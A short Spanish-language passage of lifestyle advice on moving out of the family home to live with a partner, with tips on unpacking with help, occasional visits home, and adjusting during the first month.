No te vayas solo o sola a tu nuevo hogar: Pídele a tu mamá e incluso a algún amigo íntimo u hermano que te ayude en esa labor (es mejor que no lo hagas con tu pareja), cuando lleguen desempaca todo y déjalo organizado cosa que no tengas más trabajo durante el día y puedas salir a dar una vuelta por ahí.

Regresa: Si de pronto una noche se te da por volver a casa, hazlo, pero es mejor que estás actitudes se borren por completo en menos de quince días, ya que comenzarás a construir nuevas relaciones de índole sentimental (más fuertes de las que ya tenías) y él o ella, merecen toda tu atención.

Acostúmbrate: El primer mes suele ser el más difícil, después comprenderás que es un cambio que debías hacer. Es tiempo entonces de asumir conductas más maduras, de expresar tus puntos de vista, de distribuir tareas, de crear espacios, de dormir juntos, de querer hacer planes solo para los dos.

Solo date un poco de tiempo, es un cambio muy brusco para algunos, que se debe asumir con mucha paciencia.